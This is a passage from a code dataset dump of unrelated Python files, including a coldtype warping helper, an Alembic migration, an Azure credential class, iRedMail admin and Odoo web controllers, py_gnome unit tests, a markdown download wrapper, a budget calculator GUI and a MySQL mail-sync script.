offset=(0, 1)):\n def _bend(pen):\n bw = pen.bounds().w\n a = curve.value[0][-1][0]\n b, c, d = curve.value[1][-1]\n def bender(x, y):\n c1, c2 = splitCubicAtT(a, b, c, d, offset[0] + (x/bw)*offset[1])\n _, _a, _b, _c = c1\n if tangent:\n tan = math.degrees(math.atan2(_c[1] - _b[1], _c[0] - _b[0]) + math.pi*.5)\n ax = math.sin(math.radians(90-tan)) * y\n by = math.cos(math.radians(90-tan)) * y\n return _c[0]+ax, (y+_c[1])+by\n return _c[0], y+_c[1]\n return pen.nonlinear_transform(bender)\n return _bend\n\n\ndef bend3(curve, tangent=False, offset=(0, 1)):\n def _bend(pen):\n a = curve.value[0][-1][0]\n b, c, d = curve.value[1][-1]\n bh = pen.bounds().h\n \n def bender(x, y):\n c1, c2 = splitCubicAtT(a, b, c, d, offset[0] + (y/bh)*offset[1])\n _, _a, _b, _c = c1\n if tangent:\n tan = math.degrees(math.atan2(_c[1] - _b[1], _c[0] - _b[0]) + math.pi*.5)\n ax = math.sin(math.radians(90-tan)) * y\n by = math.cos(math.radians(90-tan)) * y\n return x+_c[0]+ax, (y+_c[1])+by\n return x+_c[0], _c[1]\n return pen.nonlinear_transform(bender)\n return _bend","sub_path":"coldtype/fx/warping.py","file_name":"warping.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"357518764","text":"\"\"\"empty message\n\nRevision ID: 66eb78fa61a0\nRevises: 1ffb6ceffcb8\nCreate Date: 2019-02-15 23:48:26.494307\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '66eb78fa61a0'\ndown_revision = '1ffb6ceffcb8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('awards_db',\n sa.Column('awards_id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=128), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('awarding_body', sa.String(length=21), nullable=True),\n sa.Column('awarding_details', sa.String(length=100), nullable=True),\n sa.Column('member_name', sa.String(length=21), nullable=True),\n sa.Column('year', sa.Integer(), nullable=True),\n sa.Column('research_Profile', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['research_Profile'], ['researcher_profile.researcher_id'], ),\n sa.PrimaryKeyConstraint('awards_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('awards_db')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/66eb78fa61a0_.py","file_name":"66eb78fa61a0_.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"249240656","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nfrom typing import Any, Callable, Optional\n\nfrom azure.core.credentials import AccessToken\nfrom .._internal import AadClient, AsyncContextManager\nfrom .._internal.get_token_mixin import GetTokenMixin\n\n\nclass ClientAssertionCredential(AsyncContextManager, GetTokenMixin):\n \"\"\"Authenticates a service principal with a JWT assertion.\n\n This credential is for advanced scenarios. :class:`~azure.identity.CertificateCredential` has a more\n convenient API for the most common assertion scenario, authenticating a service principal with a certificate.\n\n :param str tenant_id: ID of the principal's tenant. Also called its \"directory\" ID.\n :param str client_id: The principal's client ID\n :param func: A callable that returns a string assertion. The credential will call this every time it\n acquires a new token.\n :paramtype func: Callable[[], str]\n\n :keyword str authority: Authority of an Azure Active Directory endpoint, for example\n \"login.microsoftonline.com\", the authority for Azure Public Cloud (which is the default).\n :class:`~azure.identity.AzureAuthorityHosts` defines authorities for other clouds.\n :keyword List[str] additionally_allowed_tenants: Specifies tenants in addition to the specified \"tenant_id\"\n for which the credential may acquire tokens. Add the wildcard value \"*\" to allow the credential to\n acquire tokens for any tenant the application can access.\n\n .. admonition:: Example:\n\n .. 
literalinclude:: ../samples/credential_creation_code_snippets.py\n :start-after: [START create_client_assertion_credential_async]\n :end-before: [END create_client_assertion_credential_async]\n :language: python\n :dedent: 4\n :caption: Create a ClientAssertionCredential.\n \"\"\"\n\n def __init__(self, tenant_id: str, client_id: str, func: Callable[[], str], **kwargs: Any) -> None:\n self._func = func\n self._client = AadClient(tenant_id, client_id, **kwargs)\n super().__init__(**kwargs)\n\n async def __aenter__(self):\n await self._client.__aenter__()\n return self\n\n async def close(self) -> None:\n \"\"\"Close the credential's transport session.\"\"\"\n await self._client.close()\n\n async def _acquire_token_silently(self, *scopes: str, **kwargs: Any) -> Optional[AccessToken]:\n return self._client.get_cached_access_token(scopes, **kwargs)\n\n async def _request_token(self, *scopes: str, **kwargs: Any) -> AccessToken:\n assertion = self._func()\n token = await self._client.obtain_token_by_jwt_assertion(scopes, assertion, **kwargs)\n return token\n","sub_path":"sdk/identity/azure-identity/azure/identity/aio/_credentials/client_assertion.py","file_name":"client_assertion.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"335974199","text":"# encoding: utf-8\n\n# Author: Zhang Huangbin \n\nimport web\nfrom libs import languages, iredutils\nfrom libs.mysql import decorators, admin as adminlib, domain as domainlib\n\ncfg = web.iredconfig\nsession = web.config.get('_session')\n\nclass List:\n @decorators.require_global_admin\n @decorators.require_login\n def GET(self, cur_page=1):\n i = web.input()\n cur_page = int(cur_page)\n\n if cur_page == 0:\n cur_page == 1\n\n adminLib = adminlib.Admin()\n result = adminLib.listAccounts(cur_page=cur_page)\n if result[0] is True:\n (total, records) = (result[1], result[2])\n\n # Get list of global admins.\n allGlobalAdmins = []\n qr = adminLib.getAllGlobalAdmins()\n if qr[0] is True:\n allGlobalAdmins = qr[1]\n\n return web.render(\n 'mysql/admin/list.html',\n cur_page=cur_page,\n total=total,\n admins=records,\n allGlobalAdmins=allGlobalAdmins,\n msg=i.get('msg', None),\n )\n else:\n return web.seeother('/domains?msg=%s' % result[1])\n\n @decorators.require_global_admin\n @decorators.require_login\n def POST(self):\n i = web.input(_unicode=False, mail=[])\n\n self.mails = i.get('mail', [])\n self.action = i.get('action', None)\n msg = i.get('msg', None)\n\n adminLib = adminlib.Admin()\n\n if self.action == 'delete':\n result = adminLib.delete(mails=self.mails,)\n msg = 'DELETED_SUCCESS'\n elif self.action == 'disable':\n result = adminLib.enableOrDisableAccount(accounts=self.mails, active=False,)\n msg = 'DISABLED_SUCCESS'\n elif self.action == 'enable':\n result = adminLib.enableOrDisableAccount(accounts=self.mails, active=True,)\n msg = 'ENABLED_SUCCESS'\n else:\n result = (False, 'INVALID_ACTION')\n\n if result[0] is True:\n return web.seeother('/admins?msg=%s' % msg)\n else:\n return web.seeother('/admins?msg=?' 
+ result[1])\n\nclass Profile:\n @decorators.require_login\n def GET(self, profile_type, mail):\n i = web.input()\n self.mail = web.safestr(mail)\n self.profile_type = web.safestr(profile_type)\n\n if not iredutils.isEmail(self.mail):\n return web.seeother('/admins?msg=INVALID_MAIL')\n\n if session.get('domainGlobalAdmin') is not True and session.get('username') != self.mail:\n # Don't allow to view/update other admins' profile.\n return web.seeother('/profile/admin/general/%s?msg=PERMISSION_DENIED' % session.get('username'))\n\n adminLib = adminlib.Admin()\n result = adminLib.profile(mail=self.mail)\n\n if result[0] is True:\n domainGlobalAdmin, profile = result[1], result[2]\n\n # Get all domains.\n self.allDomains = []\n\n domainLib = domainlib.Domain()\n resultOfAllDomains = domainLib.getAllDomains()\n if resultOfAllDomains[0] is True:\n self.allDomains = resultOfAllDomains[1]\n\n # Get managed domains.\n self.managedDomains = []\n\n qr = adminLib.getManagedDomains(admin=self.mail, domainNameOnly=True, listedOnly=True,)\n if qr[0] is True:\n self.managedDomains += qr[1]\n\n return web.render(\n 'mysql/admin/profile.html',\n mail=self.mail,\n profile_type=self.profile_type,\n domainGlobalAdmin=domainGlobalAdmin,\n profile=profile,\n languagemaps=languages.getLanguageMaps(),\n allDomains=self.allDomains,\n managedDomains=self.managedDomains,\n min_passwd_length=cfg.general.get('min_passwd_length', '0'),\n max_passwd_length=cfg.general.get('max_passwd_length', '0'),\n msg=i.get('msg'),\n )\n else:\n return web.seeother('/admins?msg=' + result[1])\n\n\n @decorators.require_login\n def POST(self, profile_type, mail):\n self.profile_type = web.safestr(profile_type)\n self.mail = web.safestr(mail)\n i = web.input(domainName=[],)\n\n if session.get('domainGlobalAdmin') is not True and session.get('username') != self.mail:\n # Don't allow to view/update others' profile.\n return web.seeother('/profile/admin/general/%s?msg=PERMISSION_DENIED' % session.get('username'))\n\n adminLib = adminlib.Admin()\n result = adminLib.update(\n profile_type=self.profile_type,\n mail=self.mail,\n data=i,\n )\n\n if result[0] is True:\n return web.seeother('/profile/admin/%s/%s?msg=PROFILE_UPDATED_SUCCESS' % (self.profile_type, self.mail))\n else:\n return web.seeother('/profile/admin/%s/%s?msg=%s' % (self.profile_type, self.mail, result[1],))\n\n\nclass Create:\n @decorators.require_global_admin\n @decorators.require_login\n def GET(self):\n i = web.input()\n return web.render(\n 'mysql/admin/create.html',\n languagemaps=languages.getLanguageMaps(),\n default_language=cfg.general.get('lang', 'en_US'),\n min_passwd_length=cfg.general.get('min_passwd_length'),\n max_passwd_length=cfg.general.get('max_passwd_length'),\n msg=i.get('msg'),\n )\n\n @decorators.require_global_admin\n @decorators.require_login\n def POST(self):\n i = web.input()\n self.mail = web.safestr(i.get('mail'))\n\n adminLib = adminlib.Admin()\n result = adminLib.add(data=i)\n\n if result[0] is True:\n # Redirect to assign domains.\n return web.seeother('/profile/admin/general/%s?msg=CREATED_SUCCESS' % self.mail)\n else:\n return web.seeother('/create/admin?msg=' + result[1])\n\n\n","sub_path":"controllers/mysql/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45770409","text":"import base64\nfrom odoo import http\nfrom odoo.http import request\n\nfrom odoo.addons.website.controllers.main import Website\n\nclass 
Main(Website):\n\n\t#homepage\n\t\"\"\"@http.route('/', type='http', auth='public', website=True)\n\tdef index(self, **kw):\n\t\treturn request.render('lhr_portal.accueil', {} )\"\"\"\n\t@http.route('/page', auth=\"public\", website=True)\n\tdef blank(self):\n\t\treturn request.render('lhr_portal.blank', {})\n\n\n\t@http.route('//formulaire-contact', auth=\"public\", website=True, csrf=False)\n\tdef formulaire_devis(self, lang=None, **post):\n\t\t#récupération des pays\n\t\tcountry_environment = request.env['res.country'] \n\t\tcountries = country_environment.sudo().search([])\n\t\tlanguage = \"fr\" if lang == \"fr_FR\" else \"en\" if lang == \"en_EN\" else \"pt\"\n\t\ttitle = \"Demande de devis\" if language == \"fr\" else \"Quote request\" if language == \"en\" else \"Orçamento personalizado\"\n\t\treturn request.render('lhr_portal.create_operation', { 'countries' : countries, 'lang':language, 'source':post.get('source'), 'title':title,} )\n\n\n\t@http.route('/success', type='http', auth='public', website=True)\n\tdef create_devis(self, **post):\n\n\t\tcontact_environment = request.env['res.partner']\n\n\t\t#do we have to create this contact\n\t\tfullname = ' '.join([post.get('lastname'), post.get('firstname')])\n\n\t\tdomain = ['&', ('name', '=', fullname), ('email', '=', post.get('email'))]\n\t\texisting_contact = contact_environment.sudo().search(domain)\n\n\t\tcontact_id = 0\n\n\t\tif not existing_contact :\n\t\t\tcontact = contact_environment.sudo().create({\n\t\t\t\t'name': fullname,\n\t\t\t\t'phone': post.get('phone'),\n\t\t\t\t'mobile': post.get('mobile'),\n\t\t\t\t'street': post.get('street'),\n\t\t\t\t'zip': post.get('zip'),\n\t\t\t\t'city': post.get('city'),\n\t\t\t\t'email': str(post.get('email')),\n\t\t\t\t'country_id' : int(post.get('country')),\n\t\t\t\t'm_gender': 'man' if str(post.get('gender')) == 'man' else 'woman',\n\t\t\t\t'm_years_old': int(post.get('yo')),\n\t\t\t\t'm_language': post.get('lang'),\n\t\t\t\t'm_graft': False if str(post.get('grafted')) == \"no\" else True,\n\t\t\t\t'm_last_intervention': False if str(post.get('grafted')) == \"no\" else True,\n\t\t\t\t'm_intervention_type': 'fue' if str(post.get('grafted')) == \"fue\" else \"fut\" if str(post.get('grafted')) == \"fut\" else \"\",\n\t\t\t})\n\t\t\tcontact_id = int(contact.id)\n\t\telse :\n\t\t\tcontact_id = int(existing_contact.id)\n\n\t\t#determine baldness degree\n\t\tbaldness_environment = request.env['graft.baldness']\n\t\tdomain = ['&', ('m_gender', '=', post.get('gender')), ('m_case', '=', post.get('case'))]\n\t\tbaldness_id = baldness_environment.sudo().search(domain)\n\n\t\t#determine origin\n\t\torigin = \"\"\n\t\tif post.get('source', False):\n\t\t\t_website = str(post.get('source')).split('.')[1]\n\t\t\torigin = \"jalis\" if _website == \"lisboahair\" else \"arpega\" if _website == \"lisboa-hair\" else \"ehi\" if _website == \"ehi-company\" else \"\"\n\n\t\t#then create new operation with status\n\t\toperation_environment = request.env['graft.operation']\n\t\toperation = operation_environment.sudo().create({\n\t\t\t'm_patient': contact_id,\n\t\t\t'm_message': post.get('message'),\n\t\t\t'm_baldness': int(baldness_id),\n\t\t\t'm_patient_origin' : origin, \n\t\t\t'm_donor_neck_filename' : str(post.get('donor_neck').filename) if post.get('donor_neck',False) else None,\n\t\t\t'm_donor_neck' : base64.b64encode(post.get('donor_neck').read()) if post.get('donor_neck',False) else None,\n\t\t\t'm_donor_side_filename' : str(post.get('donor_side').filename) if post.get('donor_side',False) else 
None,\n\t\t\t'm_donor_side' : base64.b64encode(post.get('donor_side').read()) if post.get('donor_side',False) else None,\n\t\t\t'm_treat_face_filename' : str(post.get('treat_face').filename) if post.get('treat_face',False) else None,\n\t\t\t'm_treat_face' : base64.b64encode(post.get('treat_face').read()) if post.get('treat_face',False) else None,\n\t\t\t'm_treat_side_filename' : str(post.get('treat_side').filename) if post.get('treat_side',False) else None,\n\t\t\t'm_treat_side' : base64.b64encode(post.get('treat_side').read()) if post.get('treat_side',False) else None,\n\t\t\t'm_treat_top_filename' : str(post.get('treat_top').filename) if post.get('treat_top',False) else None,\n\t\t\t'm_treat_top' : base64.b64encode(post.get('treat_top').read()) if post.get('treat_top',False) else None,\n\t\t})\n\t\treturn request.render('lhr_portal.success', {'source':post.get('source'),'lang':post.get('lang'),} )","sub_path":"lhr_portal/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300575700","text":"'''\nUnit test the classes in elementy_types module\n\nOnly contains tests for ArrayType since the remaining array_types classes\nare trivial. They are tested in the integrated_tests\n'''\n\nimport numpy as np\n\nfrom gnome.basic_types import world_point_type, oil_status, \\\n status_code_type\n\nfrom gnome.array_types import ArrayType\n\n\nclass TestArrayType_eq(object):\n\n \"\"\"\n contains functions that test __eq__ for ArrayType object\n \"\"\"\n\n def test_eq_wrong_shape(self):\n \"\"\" array shape is different for two ArrayType objects \"\"\"\n\n positions = ArrayType((), world_point_type)\n positions2 = ArrayType((3, ), world_point_type)\n assert positions != positions2\n\n def test_eq_wrong_dtype(self):\n \"\"\" dtype is different for two ArrayType objects \"\"\"\n\n positions = ArrayType((3, ), world_point_type)\n positions2 = ArrayType((3, ), np.int)\n assert positions != positions2 # wrong dtype\n\n def test_eq_wrong_init_value(self):\n \"\"\" initial_value is different for two ArrayType objects \"\"\"\n\n status_codes = ArrayType((), status_code_type,\n oil_status.in_water)\n status_codes2 = ArrayType((), status_code_type)\n assert status_codes != status_codes2 # no init conditions\n\n def test_eq_wrong_attr(self):\n \"\"\" added an attribute so two ArrayType objects are diffferent \"\"\"\n\n positions = ArrayType((), world_point_type)\n positions2 = ArrayType((3, ), world_point_type)\n positions2.test = 'test'\n assert positions != positions2 # wrong number of attributes\n\n def test_eq(self):\n \"\"\" both ArrayType objects are the same \"\"\"\n\n positions = ArrayType((3, ), world_point_type)\n positions2 = ArrayType((3, ), world_point_type)\n assert positions == positions2 # wrong shape\n\n\n","sub_path":"py_gnome/tests/unit_tests/test_array_types.py","file_name":"test_array_types.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"186504504","text":"#!/usr/bin/env python3\n# This is a light wrapper around https://github.com/ttscoff/gather-cli\n# It does not overwrite the file if it already exists.\n# And it appends the current date / time of download as a comment to the end of the file.\nimport argparse\nimport datetime\nimport os\nimport re\nimport subprocess\n\nHOME = os.environ.get(\"HOME\")\n\n\nclass Settings:\n DEBUG = False\n GATHER_DIR = 
f\"{HOME}/x/_gather/\"\n\n\ndef run(cmd: list[str]) -> str:\n _cmd = \" \".join(cmd)\n if Settings.DEBUG:\n print(\"------------\")\n print(\"running:\")\n print(_cmd)\n result = subprocess.run(cmd, capture_output=True, text=True)\n if result.returncode == 1:\n print(f\"[ERROR]: {_cmd}\")\n print(result.stdout)\n raise SystemExit\n if Settings.DEBUG:\n print(result.stdout)\n return result.stdout\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"\"\"Download and save markdown for the URL in the clipboard using gather.\n \"\"\"\n )\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\n args = parser.parse_args()\n Settings.debug = args.verbose\n\n filename = \"%slug.md\"\n tmp_path = f\"{HOME}/tmp/{filename}\"\n final_dir = Settings.GATHER_DIR\n\n cmd = [\"gather\", \"-p\", \"--metadata-yaml\", \"-f\", tmp_path]\n out = run(cmd)\n\n # grab the actual tmp_path since filename uses %s\n m = re.search(r\"Saved to file: ([\\S]+)$\", out)\n fn = None\n if m:\n tmp_path = m.group(1)\n # grab the actual markdown filename off th tmp_path since filename uses %s\n fn = re.search(r\"([^\\/]+$)\", tmp_path).group(1)\n # only move to final destination if target file does not already exist\n cmd = [\"mv\", \"-n\", tmp_path, final_dir]\n run(cmd)\n else:\n print(\"[ERROR] No tmp file........\")\n raise SystemExit(1)\n\n # cleanup tmp file\n if os.path.exists(tmp_path):\n os.remove(tmp_path)\n\n # append downloaded date as comment to end of file\n dt = datetime.datetime.now().strftime(\"%Y-%m-%d--%H-%M\")\n msg = f\"\\n\"\n final_path = os.path.join(final_dir, fn)\n with open(final_path, \"a\") as f:\n f.write(msg)\n\n print(fn)\n cmd = [\"code\", final_path]\n run(cmd)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/dl-markdown.py","file_name":"dl-markdown.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620510526","text":"import PySimpleGUI as psg\nimport datetime\n\n\n\nnull = ''\nspaces = ' '\nupdate = '09/18/2021'\nmoney_sign = ''\nmonth = datetime.datetime.today().month\n\n\n\nmonth_names = {\n 1 : 'January',\n 2 : 'February',\n 3 : 'March',\n 4 : 'April',\n 5 : 'May',\n 6 : 'June',\n 7 : 'July',\n 8 : 'August',\n 9 : 'September',\n 10 : 'October',\n 11 : 'November',\n 12 : 'December'\n}\n\n\n\ndef main():\n global money_sign\n\n background = '#D8D8D8'\n\n psg.SetOptions(background_color = background,\n element_background_color = background,\n text_element_background_color = background,\n window_location = (640, 480),\n margins=(5,5),\n text_color = 'Black',\n input_text_color = 'Black',\n button_color = ('Black', 'gainsboro'))\n\n layout = [\n [psg.Text('Made By : Alexandre0911@github.com'), psg.Text('{}Last Update Released : {}'.format(spaces*42, update))],\n [psg.Text('Amount Of Money At The Start Of The Month', size=(33)), psg.InputText(size=(42)), psg.Text('€ / $')],\n [psg.Text('Basic Necessities Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Free Time Money Percentage ', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Financial Liberty Money Percentage ', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Long-Term Expenses Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Financial Instruction Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Donations Money Percentage', size=(33)), 
psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Investments Money Percentage', size=(33)), psg.InputText(size=(42)), psg.Text('%')],\n [psg.Text('Select Currency >>>'), psg.Button('Dollars'), psg.Text('-'), psg.Button('Euros')],\n [psg.Button('Do The Math!'), psg.Text(' '*113), psg.Button('Cancel')]\n ]\n\n window = psg.Window('Money Manager v1.1', layout)\n\n\n\n while True:\n\n event, values = window.read()\n\n if event == psg.WIN_CLOSED or event == 'Cancel':\n\n break\n\n elif event == 'Dollars':\n\n money_sign = ' $'\n psg.PopupOK(' Currency was set to Dollars.', keep_on_top=True)\n\n elif event == 'Euros':\n\n money_sign = ' €'\n psg.PopupOK(' Currency was set to Euros.', keep_on_top=True)\n\n elif event == 'Do The Math!':\n print('First Step >>> {}'.format(values))\n\n try:\n \n if '' in values.values():\n \n psg.PopupOK(' Some box(es) need to be filled!')\n\n except ValueError:\n pass\n\n if money_sign == '':\n psg.PopupOK(' You need to choose a currency!')\n\n elif money_sign != '':\n print('Second Step >>> {}'.format(values))\n\n total_percentage = float(values[1]) + float(values[2]) + float(values[3]) + float(values[4]) + float(values[5]) + float(values[6]) + float(values[7])\n\n if total_percentage == 100.0:\n print('Third Step >>> {}'.format(values))\n\n my_number = float(values[0])\n psg.PopupOK(math(my_number, money_sign, float(values[1]), float(values[2]), float(values[3]), float(values[4]), float(values[5]), float(values[6]), float(values[7])), keep_on_top=True)\n\n else:\n\n psg.PopupOK('The percentages need to add up to 100.0 and they are adding up to {}!'.format(total_percentage))\n \n window.close()\n\n\n\ndef math(x, y, bn, ft, fl, lte, fe, d, i):\n basic_necessities = x * (bn/100)\n free_time = x * (ft/100)\n financial_liberty = x * (fl/100)\n long_term_expenses = x * (lte/100)\n financial_instruction = x * (fe/100)\n donations = x * (d/100)\n investments = x * (i/100)\n\n\n\n file = open('C:\\\\Users\\\\Public\\\\Desktop\\\\Money Management ({}).txt'.format(month_names[month]), mode='w+', encoding='utf-8')\n\n try:\n file.write('''Money For Basic Necessities ({}%) >>> {:.2f}{}\nMoney For Free Time ({}%) >>> {:.2f}{}\nMoney For Financial Liberty ({}%) >>> {:.2f}{}\nMoney For Long-Term Expenses ({}%) >>> {:.2f}{}\nMoney For Financial Education ({}%) >>> {:.2f}{}\nMoney For Donations ({}%) >>> {:.2f}{}\nMoney For Investments ({}%) >>> {:.2f}{}'''.format(bn, basic_necessities, y, ft, free_time, y, fl, financial_liberty, y, lte, long_term_expenses, y, fe, financial_instruction, y, d, donations, y, i, investments, y))\n finally:\n file.close()\n\n\n\n a = 'Money For Basic Necessities >>> {:.2f}{}'.format(basic_necessities, y)\n b = 'Money For Free Time >>> {:.2f}{}'.format(free_time, y)\n c = 'Money For Financial Liberty >>> {:.2f}{}'.format(financial_liberty, y)\n d = 'Money For Long-Term Expenses >>> {:.2f}{}'.format(long_term_expenses, y)\n e = 'Money For Financial Education >>> {:.2f}{}'.format(financial_instruction, y)\n f = 'Money For Donations >>> {:.2f}{}'.format(donations, y)\n g = 'Money For Investments >>> {:.2f}{}'.format(investments, y)\n\n saved = 'Document Saved to Desktop as Money Management ({}).txt'.format(month_names[month])\n\n return '{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n\\n{}'.format(a, b, c, d, e, f, g, saved)\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
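A minimal, self-contained sketch of the budget-splitting logic in the money-manager record above: validate that the category percentages sum to 100, then allocate the starting amount proportionally. The function name and the example figures are illustrative, not from the original file, and a small tolerance replaces the exact == 100.0 comparison, which is fragile for user-entered floats.

def split_budget(amount, percentages):
    """Split `amount` across categories whose percentages must total 100."""
    total = sum(percentages.values())
    if abs(total - 100.0) > 1e-9:  # float-safe variant of the == 100.0 check
        raise ValueError('percentages add up to {}, not 100'.format(total))
    return {name: amount * pct / 100.0 for name, pct in percentages.items()}

# Example: 1000.00 split across the same seven categories as the GUI above.
print(split_budget(1000.0, {
    'basic necessities': 55, 'free time': 10, 'financial liberty': 10,
    'long-term expenses': 10, 'financial education': 5,
    'donations': 5, 'investments': 5,
}))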
+{"seq_id":"413435360","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/1/30 9:31\n# @Author : 马飞\n# @File : sync_mysql2mongo.py\n# @Software: PyCharm\n# @func:通过urllib库以以节字泫发送(https协议)post请求\n\nimport sys,time\nimport traceback\nimport configparser\nimport warnings\nimport pymysql\nimport datetime\nimport smtplib\nimport json\nfrom email.mime.text import MIMEText\nimport urllib.parse\nimport urllib.request\nimport ssl\n#ssl._create_default_https_context = ssl._create_unverified_context\n\ndef send_mail465(p_from_user,p_from_pass,p_to_user,p_title,p_content):\n to_user=p_to_user.split(\",\")\n try:\n msg = MIMEText(p_content,'html','utf-8')\n msg[\"Subject\"] = p_title\n msg[\"From\"] = p_from_user\n msg[\"To\"] = \",\".join(to_user)\n server = smtplib.SMTP_SSL(\"smtp.exmail.qq.com\", 465)\n server.set_debuglevel(0)\n server.login(p_from_user, p_from_pass)\n server.sendmail(p_from_user, to_user, msg.as_string())\n server.quit()\n return 0\n except smtplib.SMTPException as e:\n print(e)\n return -1\n\ndef send_mail(p_from_user,p_from_pass,p_to_user,p_title,p_content):\n to_user=p_to_user.split(\",\")\n try:\n msg = MIMEText(p_content,'html','utf-8')\n msg[\"Subject\"] = p_title\n msg[\"From\"] = p_from_user\n msg[\"To\"] = \",\".join(to_user)\n server = smtplib.SMTP(\"smtp.exmail.qq.com\", 25)\n server.set_debuglevel(0)\n server.login(p_from_user, p_from_pass)\n server.sendmail(p_from_user, to_user, msg.as_string())\n server.quit()\n except smtplib.SMTPException as e:\n print(e)\n\ndef exception_info():\n e_str=traceback.format_exc()\n return e_str[e_str.find(\"pymysql.err.\"):]\n\ndef get_now():\n return datetime.datetime.now().strftime(\"%H:%M:%S\")\n\ndef get_time():\n return datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\ndef get_date():\n return datetime.datetime.now().strftime(\"%Y%m%d\")\n\ndef get_ds_mysql(ip,port,service ,user,password):\n conn = pymysql.connect(host=ip, port=int(port), user=user, passwd=password, db=service, charset='utf8')\n return conn\n\ndef get_db_mysql(config):\n return get_ds_mysql(config['db_mysql_ip'],config['db_mysql_port'],config['db_mysql_service'],\\\n config['db_mysql_user'],config['db_mysql_pass'])\n\ndef get_config(fname):\n config = {}\n cfg=configparser.ConfigParser()\n cfg.read(fname,encoding=\"utf-8-sig\")\n db_mysql = cfg.get(\"sync\",\"db_mysql\")\n config['db_mysql_ip'] = db_mysql.split(':')[0]\n config['db_mysql_port'] = db_mysql.split(':')[1]\n config['db_mysql_service'] = db_mysql.split(':')[2]\n config['db_mysql_user'] = db_mysql.split(':')[3]\n config['db_mysql_pass'] = db_mysql.split(':')[4]\n config['send_gap'] = cfg.get(\"sync\", \"send_gap\")\n config['send_user'] = cfg.get(\"sync\", \"send_mail_user\")\n config['send_pass'] = cfg.get(\"sync\", \"send_mail_pass\")\n config['acpt_user'] = cfg.get(\"sync\", \"acpt_mail_user\")\n config['mail_title'] = cfg.get(\"sync\", \"mail_title\")\n config['hopson_interface'] = cfg.get(\"sync\",\"hopson_interface\")\n config['db_mysql_string'] = config['db_mysql_ip'] +':'+config['db_mysql_port'] +'/'+config['db_mysql_service']\n return config\n\ndef check_mysql_tab_exists(config,tab):\n db=config['db_mysql_desc']\n cr=db.cursor()\n sql=\"\"\"select count(0) from information_schema.tables\n where table_schema=database() and table_name='{0}'\"\"\".format(tab )\n cr.execute(sql)\n rs=cr.fetchone()\n cr.close()\n db.commit()\n return rs[0]\n\ndef get_mysql_tab_rows(config,tab):\n db=config['db_mysql_desc3']\n cr=db.cursor()\n sql=\"\"\"select count(0) from 
{0}\"\"\".format(tab )\n cr.execute(sql)\n rs=cr.fetchone()\n cr.close()\n db.commit()\n return rs[0]\n\ndef check_mysql_tab_exists_pk(config,tab):\n db=config['db_mysql_sour']\n cr=db.cursor()\n sql = \"\"\"select count(0) from information_schema.columns\n where table_schema=database() and table_name='{0}' and column_key='PRI'\"\"\".format(tab)\n cr.execute(sql)\n rs=cr.fetchone()\n cr.close()\n db.commit()\n return rs[0]\n\ndef get_seconds(b):\n a=datetime.datetime.now()\n return int((a-b).total_seconds())\n\ndef print_dict(config):\n print('-'.ljust(85,'-'))\n print(' '.ljust(3,' ')+\"name\".ljust(20,' ')+'value')\n print('-'.ljust(85,'-'))\n for key in config:\n print(' '.ljust(3,' ')+key.ljust(20,' ')+'=',config[key])\n print('-'.ljust(85,'-'))\n\ndef format_sql(v_sql):\n return v_sql.replace(\"\\\\\",\"\\\\\\\\\").replace(\"'\",\"\\\\'\")\n\ndef init(config):\n config = get_config(config)\n #print dict\n print_dict(config)\n return config\n\n#判断待办任务是否推送过消息\ndef isSend(config,id):\n db = get_db_mysql(config)\n cr = db.cursor()\n sql = \"select count(0) from ot_workitem_ext where id={0} and isSend='Y'\".format(id)\n cr.execute(sql)\n rs=cr.fetchone()\n if rs[0]>0:\n return True\n else:\n return False\n\ndef get_relationId(config,v_tab,v_bizid):\n db = get_db_mysql(config)\n cr = db.cursor()\n sql = \"select id from {0} where objectid='{1}'\".format(v_tab,v_bizid)\n try:\n cr.execute(sql)\n rs = cr.fetchone()\n cr.close()\n return rs[0]\n except:\n return 